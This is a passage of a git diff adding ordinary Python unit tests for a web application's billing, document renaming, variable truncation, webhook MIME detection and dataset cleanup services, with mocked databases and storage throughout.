mock_send_request.call_count == 1 + + def test_get_plan_bulk_with_empty_data_response(self, mock_send_request): + """Test bulk plan retrieval with empty data in response.""" + # Arrange + tenant_ids = ["tenant-1", "tenant-2"] + mock_send_request.return_value = {"data": {}} + + # Act + result = BillingService.get_plan_bulk(tenant_ids) + + # Assert + assert result == {} + + def test_get_expired_subscription_cleanup_whitelist_success(self, mock_send_request): + """Test successful retrieval of expired subscription cleanup whitelist.""" + # Arrange + api_response = [ + { + "created_at": "2025-10-16T01:56:17", + "tenant_id": "36bd55ec-2ea9-4d75-a9ea-1f26aeb4ffe6", + "contact": "example@dify.ai", + "id": "36bd55ec-2ea9-4d75-a9ea-1f26aeb4ffe5", + "expired_at": "2026-01-01T01:56:17", + "updated_at": "2025-10-16T01:56:17", + }, + { + "created_at": "2025-10-16T02:00:00", + "tenant_id": "tenant-2", + "contact": "test@example.com", + "id": "whitelist-id-2", + "expired_at": "2026-02-01T00:00:00", + "updated_at": "2025-10-16T02:00:00", + }, + { + "created_at": "2025-10-16T03:00:00", + "tenant_id": "tenant-3", + "contact": "another@example.com", + "id": "whitelist-id-3", + "expired_at": "2026-03-01T00:00:00", + "updated_at": "2025-10-16T03:00:00", + }, + ] + mock_send_request.return_value = {"data": api_response} + + # Act + result = BillingService.get_expired_subscription_cleanup_whitelist() + + # Assert - should return only tenant_ids + assert result == ["36bd55ec-2ea9-4d75-a9ea-1f26aeb4ffe6", "tenant-2", "tenant-3"] + assert len(result) == 3 + assert result[0] == "36bd55ec-2ea9-4d75-a9ea-1f26aeb4ffe6" + assert result[1] == "tenant-2" + assert result[2] == "tenant-3" + mock_send_request.assert_called_once_with("GET", "/subscription/cleanup/whitelist") + + def test_get_expired_subscription_cleanup_whitelist_empty_list(self, mock_send_request): + """Test retrieval of empty cleanup whitelist.""" + # Arrange + mock_send_request.return_value = {"data": []} + + # Act + result = 
BillingService.get_expired_subscription_cleanup_whitelist() + + # Assert + assert result == [] + assert len(result) == 0 + + class TestBillingServiceIntegrationScenarios: """Integration-style tests simulating real-world usage scenarios. diff --git a/api/tests/unit_tests/services/test_document_service_rename_document.py b/api/tests/unit_tests/services/test_document_service_rename_document.py new file mode 100644 index 0000000000..94850ecb09 --- /dev/null +++ b/api/tests/unit_tests/services/test_document_service_rename_document.py @@ -0,0 +1,176 @@ +from types import SimpleNamespace +from unittest.mock import Mock, create_autospec, patch + +import pytest + +from models import Account +from services.dataset_service import DocumentService + + +@pytest.fixture +def mock_env(): + """Patch dependencies used by DocumentService.rename_document. + + Mocks: + - DatasetService.get_dataset + - DocumentService.get_document + - current_user (with current_tenant_id) + - db.session + """ + with ( + patch("services.dataset_service.DatasetService.get_dataset") as get_dataset, + patch("services.dataset_service.DocumentService.get_document") as get_document, + patch("services.dataset_service.current_user", create_autospec(Account, instance=True)) as current_user, + patch("extensions.ext_database.db.session") as db_session, + ): + current_user.current_tenant_id = "tenant-123" + yield { + "get_dataset": get_dataset, + "get_document": get_document, + "current_user": current_user, + "db_session": db_session, + } + + +def make_dataset(dataset_id="dataset-123", tenant_id="tenant-123", built_in_field_enabled=False): + return SimpleNamespace(id=dataset_id, tenant_id=tenant_id, built_in_field_enabled=built_in_field_enabled) + + +def make_document( + document_id="document-123", + dataset_id="dataset-123", + tenant_id="tenant-123", + name="Old Name", + data_source_info=None, + doc_metadata=None, +): + doc = Mock() + doc.id = document_id + doc.dataset_id = dataset_id + doc.tenant_id = tenant_id + 
doc.name = name + doc.data_source_info = data_source_info or {} + # property-like usage in code relies on a dict + doc.data_source_info_dict = dict(doc.data_source_info) + doc.doc_metadata = dict(doc_metadata or {}) + return doc + + +def test_rename_document_success(mock_env): + dataset_id = "dataset-123" + document_id = "document-123" + new_name = "New Document Name" + + dataset = make_dataset(dataset_id) + document = make_document(document_id=document_id, dataset_id=dataset_id) + + mock_env["get_dataset"].return_value = dataset + mock_env["get_document"].return_value = document + + result = DocumentService.rename_document(dataset_id, document_id, new_name) + + assert result is document + assert document.name == new_name + mock_env["db_session"].add.assert_called_once_with(document) + mock_env["db_session"].commit.assert_called_once() + + +def test_rename_document_with_built_in_fields(mock_env): + dataset_id = "dataset-123" + document_id = "document-123" + new_name = "Renamed" + + dataset = make_dataset(dataset_id, built_in_field_enabled=True) + document = make_document(document_id=document_id, dataset_id=dataset_id, doc_metadata={"foo": "bar"}) + + mock_env["get_dataset"].return_value = dataset + mock_env["get_document"].return_value = document + + DocumentService.rename_document(dataset_id, document_id, new_name) + + assert document.name == new_name + # BuiltInField.document_name == "document_name" in service code + assert document.doc_metadata["document_name"] == new_name + assert document.doc_metadata["foo"] == "bar" + + +def test_rename_document_updates_upload_file_when_present(mock_env): + dataset_id = "dataset-123" + document_id = "document-123" + new_name = "Renamed" + file_id = "file-123" + + dataset = make_dataset(dataset_id) + document = make_document( + document_id=document_id, + dataset_id=dataset_id, + data_source_info={"upload_file_id": file_id}, + ) + + mock_env["get_dataset"].return_value = dataset + mock_env["get_document"].return_value = 
document + + # Intercept UploadFile rename UPDATE chain + mock_query = Mock() + mock_query.where.return_value = mock_query + mock_env["db_session"].query.return_value = mock_query + + DocumentService.rename_document(dataset_id, document_id, new_name) + + assert document.name == new_name + mock_env["db_session"].query.assert_called() # update executed + + +def test_rename_document_does_not_update_upload_file_when_missing_id(mock_env): + """ + When data_source_info_dict exists but does not contain "upload_file_id", + UploadFile should not be updated. + """ + dataset_id = "dataset-123" + document_id = "document-123" + new_name = "Another Name" + + dataset = make_dataset(dataset_id) + # Ensure data_source_info_dict is truthy but lacks the key + document = make_document( + document_id=document_id, + dataset_id=dataset_id, + data_source_info={"url": "https://example.com"}, + ) + + mock_env["get_dataset"].return_value = dataset + mock_env["get_document"].return_value = document + + DocumentService.rename_document(dataset_id, document_id, new_name) + + assert document.name == new_name + # Should NOT attempt to update UploadFile + mock_env["db_session"].query.assert_not_called() + + +def test_rename_document_dataset_not_found(mock_env): + mock_env["get_dataset"].return_value = None + + with pytest.raises(ValueError, match="Dataset not found"): + DocumentService.rename_document("missing", "doc", "x") + + +def test_rename_document_not_found(mock_env): + dataset = make_dataset("dataset-123") + mock_env["get_dataset"].return_value = dataset + mock_env["get_document"].return_value = None + + with pytest.raises(ValueError, match="Document not found"): + DocumentService.rename_document(dataset.id, "missing", "x") + + +def test_rename_document_permission_denied_when_tenant_mismatch(mock_env): + dataset = make_dataset("dataset-123") + # different tenant than current_user.current_tenant_id + document = make_document(dataset_id=dataset.id, tenant_id="tenant-other") + + 
mock_env["get_dataset"].return_value = dataset + mock_env["get_document"].return_value = document + + with pytest.raises(ValueError, match="No permission"): + DocumentService.rename_document(dataset.id, document.id, "x") diff --git a/api/tests/unit_tests/services/test_variable_truncator.py b/api/tests/unit_tests/services/test_variable_truncator.py index cf6fb25c1c..ec819ae57a 100644 --- a/api/tests/unit_tests/services/test_variable_truncator.py +++ b/api/tests/unit_tests/services/test_variable_truncator.py @@ -518,6 +518,55 @@ class TestEdgeCases: assert isinstance(result.result, StringSegment) +class TestTruncateJsonPrimitives: + """Test _truncate_json_primitives method with different data types.""" + + @pytest.fixture + def truncator(self): + return VariableTruncator() + + def test_truncate_json_primitives_file_type(self, truncator, file): + """Test that File objects are handled correctly in _truncate_json_primitives.""" + # Test File object is returned as-is without truncation + result = truncator._truncate_json_primitives(file, 1000) + + assert result.value == file + assert result.truncated is False + # Size should be calculated correctly + expected_size = VariableTruncator.calculate_json_size(file) + assert result.value_size == expected_size + + def test_truncate_json_primitives_file_type_small_budget(self, truncator, file): + """Test that File objects are returned as-is even with small budget.""" + # Even with a small size budget, File objects should not be truncated + result = truncator._truncate_json_primitives(file, 10) + + assert result.value == file + assert result.truncated is False + + def test_truncate_json_primitives_file_type_in_array(self, truncator, file): + """Test File objects in arrays are handled correctly.""" + array_with_files = [file, file] + result = truncator._truncate_json_primitives(array_with_files, 1000) + + assert isinstance(result.value, list) + assert len(result.value) == 2 + assert result.value[0] == file + assert result.value[1] 
== file + assert result.truncated is False + + def test_truncate_json_primitives_file_type_in_object(self, truncator, file): + """Test File objects in objects are handled correctly.""" + obj_with_files = {"file1": file, "file2": file} + result = truncator._truncate_json_primitives(obj_with_files, 1000) + + assert isinstance(result.value, dict) + assert len(result.value) == 2 + assert result.value["file1"] == file + assert result.value["file2"] == file + assert result.truncated is False + + class TestIntegrationScenarios: """Test realistic integration scenarios.""" diff --git a/api/tests/unit_tests/services/test_webhook_service.py b/api/tests/unit_tests/services/test_webhook_service.py index 6afe52d97b..d788657589 100644 --- a/api/tests/unit_tests/services/test_webhook_service.py +++ b/api/tests/unit_tests/services/test_webhook_service.py @@ -82,19 +82,19 @@ class TestWebhookServiceUnit: "/webhook", method="POST", headers={"Content-Type": "multipart/form-data"}, - data={"message": "test", "upload": file_storage}, + data={"message": "test", "file": file_storage}, ): webhook_trigger = MagicMock() webhook_trigger.tenant_id = "test_tenant" with patch.object(WebhookService, "_process_file_uploads") as mock_process_files: - mock_process_files.return_value = {"upload": "mocked_file_obj"} + mock_process_files.return_value = {"file": "mocked_file_obj"} webhook_data = WebhookService.extract_webhook_data(webhook_trigger) assert webhook_data["method"] == "POST" assert webhook_data["body"]["message"] == "test" - assert webhook_data["files"]["upload"] == "mocked_file_obj" + assert webhook_data["files"]["file"] == "mocked_file_obj" mock_process_files.assert_called_once() def test_extract_webhook_data_raw_text(self): @@ -110,6 +110,70 @@ class TestWebhookServiceUnit: assert webhook_data["method"] == "POST" assert webhook_data["body"]["raw"] == "raw text content" + def test_extract_octet_stream_body_uses_detected_mime(self): + """Octet-stream uploads should rely on detected MIME 
type.""" + app = Flask(__name__) + binary_content = b"plain text data" + + with app.test_request_context( + "/webhook", method="POST", headers={"Content-Type": "application/octet-stream"}, data=binary_content + ): + webhook_trigger = MagicMock() + mock_file = MagicMock() + mock_file.to_dict.return_value = {"file": "data"} + + with ( + patch.object(WebhookService, "_detect_binary_mimetype", return_value="text/plain") as mock_detect, + patch.object(WebhookService, "_create_file_from_binary") as mock_create, + ): + mock_create.return_value = mock_file + body, files = WebhookService._extract_octet_stream_body(webhook_trigger) + + assert body["raw"] == {"file": "data"} + assert files == {} + mock_detect.assert_called_once_with(binary_content) + mock_create.assert_called_once() + args = mock_create.call_args[0] + assert args[0] == binary_content + assert args[1] == "text/plain" + assert args[2] is webhook_trigger + + def test_detect_binary_mimetype_uses_magic(self, monkeypatch): + """python-magic output should be used when available.""" + fake_magic = MagicMock() + fake_magic.from_buffer.return_value = "image/png" + monkeypatch.setattr("services.trigger.webhook_service.magic", fake_magic) + + result = WebhookService._detect_binary_mimetype(b"binary data") + + assert result == "image/png" + fake_magic.from_buffer.assert_called_once() + + def test_detect_binary_mimetype_fallback_without_magic(self, monkeypatch): + """Fallback MIME type should be used when python-magic is unavailable.""" + monkeypatch.setattr("services.trigger.webhook_service.magic", None) + + result = WebhookService._detect_binary_mimetype(b"binary data") + + assert result == "application/octet-stream" + + def test_detect_binary_mimetype_handles_magic_exception(self, monkeypatch): + """Fallback MIME type should be used when python-magic raises an exception.""" + try: + import magic as real_magic + except ImportError: + pytest.skip("python-magic is not installed") + + fake_magic = MagicMock() + 
fake_magic.from_buffer.side_effect = real_magic.MagicException("magic error") + monkeypatch.setattr("services.trigger.webhook_service.magic", fake_magic) + + with patch("services.trigger.webhook_service.logger") as mock_logger: + result = WebhookService._detect_binary_mimetype(b"binary data") + + assert result == "application/octet-stream" + mock_logger.debug.assert_called_once() + def test_extract_webhook_data_invalid_json(self): """Test webhook data extraction with invalid JSON.""" app = Flask(__name__) diff --git a/api/tests/unit_tests/tasks/test_clean_dataset_task.py b/api/tests/unit_tests/tasks/test_clean_dataset_task.py new file mode 100644 index 0000000000..bace66bec4 --- /dev/null +++ b/api/tests/unit_tests/tasks/test_clean_dataset_task.py @@ -0,0 +1,1232 @@ +""" +Unit tests for clean_dataset_task. + +This module tests the dataset cleanup task functionality including: +- Basic cleanup of documents and segments +- Vector database cleanup with IndexProcessorFactory +- Storage file deletion +- Invalid doc_form handling with default fallback +- Error handling and database session rollback +- Pipeline and workflow deletion +- Segment attachment cleanup +""" + +import uuid +from unittest.mock import MagicMock, patch + +import pytest + +from tasks.clean_dataset_task import clean_dataset_task + +# ============================================================================ +# Fixtures +# ============================================================================ + + +@pytest.fixture +def tenant_id(): + """Generate a unique tenant ID for testing.""" + return str(uuid.uuid4()) + + +@pytest.fixture +def dataset_id(): + """Generate a unique dataset ID for testing.""" + return str(uuid.uuid4()) + + +@pytest.fixture +def collection_binding_id(): + """Generate a unique collection binding ID for testing.""" + return str(uuid.uuid4()) + + +@pytest.fixture +def pipeline_id(): + """Generate a unique pipeline ID for testing.""" + return str(uuid.uuid4()) + + +@pytest.fixture 
+def mock_db_session(): + """Mock database session with query capabilities.""" + with patch("tasks.clean_dataset_task.db") as mock_db: + mock_session = MagicMock() + mock_db.session = mock_session + + # Setup query chain + mock_query = MagicMock() + mock_session.query.return_value = mock_query + mock_query.where.return_value = mock_query + mock_query.delete.return_value = 0 + + # Setup scalars for select queries + mock_session.scalars.return_value.all.return_value = [] + + # Setup execute for JOIN queries + mock_session.execute.return_value.all.return_value = [] + + yield mock_db + + +@pytest.fixture +def mock_storage(): + """Mock storage client.""" + with patch("tasks.clean_dataset_task.storage") as mock_storage: + mock_storage.delete.return_value = None + yield mock_storage + + +@pytest.fixture +def mock_index_processor_factory(): + """Mock IndexProcessorFactory.""" + with patch("tasks.clean_dataset_task.IndexProcessorFactory") as mock_factory: + mock_processor = MagicMock() + mock_processor.clean.return_value = None + mock_factory_instance = MagicMock() + mock_factory_instance.init_index_processor.return_value = mock_processor + mock_factory.return_value = mock_factory_instance + + yield { + "factory": mock_factory, + "factory_instance": mock_factory_instance, + "processor": mock_processor, + } + + +@pytest.fixture +def mock_get_image_upload_file_ids(): + """Mock get_image_upload_file_ids function.""" + with patch("tasks.clean_dataset_task.get_image_upload_file_ids") as mock_func: + mock_func.return_value = [] + yield mock_func + + +@pytest.fixture +def mock_document(): + """Create a mock Document object.""" + doc = MagicMock() + doc.id = str(uuid.uuid4()) + doc.tenant_id = str(uuid.uuid4()) + doc.dataset_id = str(uuid.uuid4()) + doc.data_source_type = "upload_file" + doc.data_source_info = '{"upload_file_id": "test-file-id"}' + doc.data_source_info_dict = {"upload_file_id": "test-file-id"} + return doc + + +@pytest.fixture +def mock_segment(): + """Create a 
mock DocumentSegment object.""" + segment = MagicMock() + segment.id = str(uuid.uuid4()) + segment.content = "Test segment content" + return segment + + +@pytest.fixture +def mock_upload_file(): + """Create a mock UploadFile object.""" + upload_file = MagicMock() + upload_file.id = str(uuid.uuid4()) + upload_file.key = f"test_files/{uuid.uuid4()}.txt" + return upload_file + + +# ============================================================================ +# Test Basic Cleanup +# ============================================================================ + + +class TestBasicCleanup: + """Test cases for basic dataset cleanup functionality.""" + + def test_clean_dataset_task_empty_dataset( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test cleanup of an empty dataset with no documents or segments. + + Scenario: + - Dataset has no documents or segments + - Should still clean vector database and delete related records + + Expected behavior: + - IndexProcessorFactory is called to clean vector database + - No storage deletions occur + - Related records (DatasetProcessRule, etc.) 
are deleted + - Session is committed and closed + """ + # Arrange + mock_db_session.session.scalars.return_value.all.return_value = [] + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_index_processor_factory["factory"].assert_called_once_with("paragraph_index") + mock_index_processor_factory["processor"].clean.assert_called_once() + mock_storage.delete.assert_not_called() + mock_db_session.session.commit.assert_called_once() + mock_db_session.session.close.assert_called_once() + + def test_clean_dataset_task_with_documents_and_segments( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + mock_document, + mock_segment, + ): + """ + Test cleanup of dataset with documents and segments. 
+ + Scenario: + - Dataset has one document and one segment + - No image files in segment content + + Expected behavior: + - Documents and segments are deleted + - Vector database is cleaned + - Session is committed + """ + # Arrange + mock_db_session.session.scalars.return_value.all.side_effect = [ + [mock_document], # documents + [mock_segment], # segments + ] + mock_get_image_upload_file_ids.return_value = [] + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_db_session.session.delete.assert_any_call(mock_document) + mock_db_session.session.delete.assert_any_call(mock_segment) + mock_db_session.session.commit.assert_called_once() + + def test_clean_dataset_task_deletes_related_records( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that all related records are deleted. + + Expected behavior: + - DatasetProcessRule records are deleted + - DatasetQuery records are deleted + - AppDatasetJoin records are deleted + - DatasetMetadata records are deleted + - DatasetMetadataBinding records are deleted + """ + # Arrange + mock_query = mock_db_session.session.query.return_value + mock_query.where.return_value = mock_query + mock_query.delete.return_value = 1 + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert - verify query.where.delete was called multiple times + # for different models (DatasetProcessRule, DatasetQuery, etc.) 
+ assert mock_query.delete.call_count >= 5 + + +# ============================================================================ +# Test Doc Form Validation +# ============================================================================ + + +class TestDocFormValidation: + """Test cases for doc_form validation and default fallback.""" + + @pytest.mark.parametrize( + "invalid_doc_form", + [ + None, + "", + " ", + "\t", + "\n", + " \t\n ", + ], + ) + def test_clean_dataset_task_invalid_doc_form_uses_default( + self, + invalid_doc_form, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that invalid doc_form values use default paragraph index type. + + Scenario: + - doc_form is None, empty, or whitespace-only + - Should use default IndexStructureType.PARAGRAPH_INDEX + + Expected behavior: + - Default index type is used for cleanup + - No errors are raised + - Cleanup proceeds normally + """ + # Arrange - import to verify the default value + from core.rag.index_processor.constant.index_type import IndexStructureType + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form=invalid_doc_form, + ) + + # Assert - IndexProcessorFactory should be called with default type + mock_index_processor_factory["factory"].assert_called_once_with(IndexStructureType.PARAGRAPH_INDEX) + mock_index_processor_factory["processor"].clean.assert_called_once() + + def test_clean_dataset_task_valid_doc_form_used_directly( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that valid doc_form values are used directly. 
+ + Expected behavior: + - Provided doc_form is passed to IndexProcessorFactory + """ + # Arrange + valid_doc_form = "qa_index" + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form=valid_doc_form, + ) + + # Assert + mock_index_processor_factory["factory"].assert_called_once_with(valid_doc_form) + + +# ============================================================================ +# Test Error Handling +# ============================================================================ + + +class TestErrorHandling: + """Test cases for error handling and recovery.""" + + def test_clean_dataset_task_vector_cleanup_failure_continues( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + mock_document, + mock_segment, + ): + """ + Test that document cleanup continues even if vector cleanup fails. 
+ + Scenario: + - IndexProcessor.clean() raises an exception + - Document and segment deletion should still proceed + + Expected behavior: + - Exception is caught and logged + - Documents and segments are still deleted + - Session is committed + """ + # Arrange + mock_db_session.session.scalars.return_value.all.side_effect = [ + [mock_document], # documents + [mock_segment], # segments + ] + mock_index_processor_factory["processor"].clean.side_effect = Exception("Vector database error") + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert - documents and segments should still be deleted + mock_db_session.session.delete.assert_any_call(mock_document) + mock_db_session.session.delete.assert_any_call(mock_segment) + mock_db_session.session.commit.assert_called_once() + + def test_clean_dataset_task_storage_delete_failure_continues( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that cleanup continues even if storage deletion fails. 
+ + Scenario: + - Segment contains image file references + - Storage.delete() raises an exception + - Cleanup should continue + + Expected behavior: + - Exception is caught and logged + - Image file record is still deleted from database + - Other cleanup operations proceed + """ + # Arrange + # Need at least one document for segment processing to occur (code is in else block) + mock_document = MagicMock() + mock_document.id = str(uuid.uuid4()) + mock_document.tenant_id = tenant_id + mock_document.data_source_type = "website" # Non-upload type to avoid file deletion + + mock_segment = MagicMock() + mock_segment.id = str(uuid.uuid4()) + mock_segment.content = "Test content with image" + + mock_upload_file = MagicMock() + mock_upload_file.id = str(uuid.uuid4()) + mock_upload_file.key = "images/test-image.jpg" + + image_file_id = mock_upload_file.id + + mock_db_session.session.scalars.return_value.all.side_effect = [ + [mock_document], # documents - need at least one for segment processing + [mock_segment], # segments + ] + mock_get_image_upload_file_ids.return_value = [image_file_id] + mock_db_session.session.query.return_value.where.return_value.first.return_value = mock_upload_file + mock_storage.delete.side_effect = Exception("Storage service unavailable") + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert - storage delete was attempted for image file + mock_storage.delete.assert_called_with(mock_upload_file.key) + # Image file should still be deleted from database + mock_db_session.session.delete.assert_any_call(mock_upload_file) + + def test_clean_dataset_task_database_error_rollback( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that 
database session is rolled back on error. + + Scenario: + - Database operation raises an exception + - Session should be rolled back to prevent dirty state + + Expected behavior: + - Session.rollback() is called + - Session.close() is called in finally block + """ + # Arrange + mock_db_session.session.commit.side_effect = Exception("Database commit failed") + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_db_session.session.rollback.assert_called_once() + mock_db_session.session.close.assert_called_once() + + def test_clean_dataset_task_rollback_failure_still_closes_session( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that session is closed even if rollback fails. 
+ + Scenario: + - Database commit fails + - Rollback also fails + - Session should still be closed + + Expected behavior: + - Session.close() is called regardless of rollback failure + """ + # Arrange + mock_db_session.session.commit.side_effect = Exception("Commit failed") + mock_db_session.session.rollback.side_effect = Exception("Rollback failed") + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_db_session.session.close.assert_called_once() + + +# ============================================================================ +# Test Pipeline and Workflow Deletion +# ============================================================================ + + +class TestPipelineAndWorkflowDeletion: + """Test cases for pipeline and workflow deletion.""" + + def test_clean_dataset_task_with_pipeline_id( + self, + dataset_id, + tenant_id, + collection_binding_id, + pipeline_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that pipeline and workflow are deleted when pipeline_id is provided. 
+ + Expected behavior: + - Pipeline record is deleted + - Related workflow record is deleted + """ + # Arrange + mock_query = mock_db_session.session.query.return_value + mock_query.where.return_value = mock_query + mock_query.delete.return_value = 1 + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + pipeline_id=pipeline_id, + ) + + # Assert - verify delete was called for pipeline-related queries + # The actual count depends on total queries, but pipeline deletion should add 2 more + assert mock_query.delete.call_count >= 7 # 5 base + 2 pipeline/workflow + + def test_clean_dataset_task_without_pipeline_id( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that pipeline/workflow deletion is skipped when pipeline_id is None. 
+ + Expected behavior: + - Pipeline and workflow deletion queries are not executed + """ + # Arrange + mock_query = mock_db_session.session.query.return_value + mock_query.where.return_value = mock_query + mock_query.delete.return_value = 1 + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + pipeline_id=None, + ) + + # Assert - verify delete was called only for base queries (5 times) + assert mock_query.delete.call_count == 5 + + +# ============================================================================ +# Test Segment Attachment Cleanup +# ============================================================================ + + +class TestSegmentAttachmentCleanup: + """Test cases for segment attachment cleanup.""" + + def test_clean_dataset_task_with_attachments( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that segment attachments are cleaned up properly. 
+ + Scenario: + - Dataset has segment attachments with associated files + - Both binding and file records should be deleted + + Expected behavior: + - Storage.delete() is called for each attachment file + - Attachment file records are deleted from database + - Binding records are deleted from database + """ + # Arrange + mock_binding = MagicMock() + mock_binding.attachment_id = str(uuid.uuid4()) + + mock_attachment_file = MagicMock() + mock_attachment_file.id = mock_binding.attachment_id + mock_attachment_file.key = f"attachments/{uuid.uuid4()}.pdf" + + # Setup execute to return attachment with binding + mock_db_session.session.execute.return_value.all.return_value = [(mock_binding, mock_attachment_file)] + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_storage.delete.assert_called_with(mock_attachment_file.key) + mock_db_session.session.delete.assert_any_call(mock_attachment_file) + mock_db_session.session.delete.assert_any_call(mock_binding) + + def test_clean_dataset_task_attachment_storage_failure( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that cleanup continues even if attachment storage deletion fails. 
+ + Expected behavior: + - Exception is caught and logged + - Attachment file and binding are still deleted from database + """ + # Arrange + mock_binding = MagicMock() + mock_binding.attachment_id = str(uuid.uuid4()) + + mock_attachment_file = MagicMock() + mock_attachment_file.id = mock_binding.attachment_id + mock_attachment_file.key = f"attachments/{uuid.uuid4()}.pdf" + + mock_db_session.session.execute.return_value.all.return_value = [(mock_binding, mock_attachment_file)] + mock_storage.delete.side_effect = Exception("Storage error") + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert - storage delete was attempted + mock_storage.delete.assert_called_once() + # Records should still be deleted from database + mock_db_session.session.delete.assert_any_call(mock_attachment_file) + mock_db_session.session.delete.assert_any_call(mock_binding) + + +# ============================================================================ +# Test Upload File Cleanup +# ============================================================================ + + +class TestUploadFileCleanup: + """Test cases for upload file cleanup.""" + + def test_clean_dataset_task_deletes_document_upload_files( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that document upload files are deleted. 
+ + Scenario: + - Document has data_source_type = "upload_file" + - data_source_info contains upload_file_id + + Expected behavior: + - Upload file is deleted from storage + - Upload file record is deleted from database + """ + # Arrange + mock_document = MagicMock() + mock_document.id = str(uuid.uuid4()) + mock_document.tenant_id = tenant_id + mock_document.data_source_type = "upload_file" + mock_document.data_source_info = '{"upload_file_id": "test-file-id"}' + mock_document.data_source_info_dict = {"upload_file_id": "test-file-id"} + + mock_upload_file = MagicMock() + mock_upload_file.id = "test-file-id" + mock_upload_file.key = "uploads/test-file.txt" + + mock_db_session.session.scalars.return_value.all.side_effect = [ + [mock_document], # documents + [], # segments + ] + mock_db_session.session.query.return_value.where.return_value.first.return_value = mock_upload_file + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_storage.delete.assert_called_with(mock_upload_file.key) + mock_db_session.session.delete.assert_any_call(mock_upload_file) + + def test_clean_dataset_task_handles_missing_upload_file( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that missing upload files are handled gracefully. 
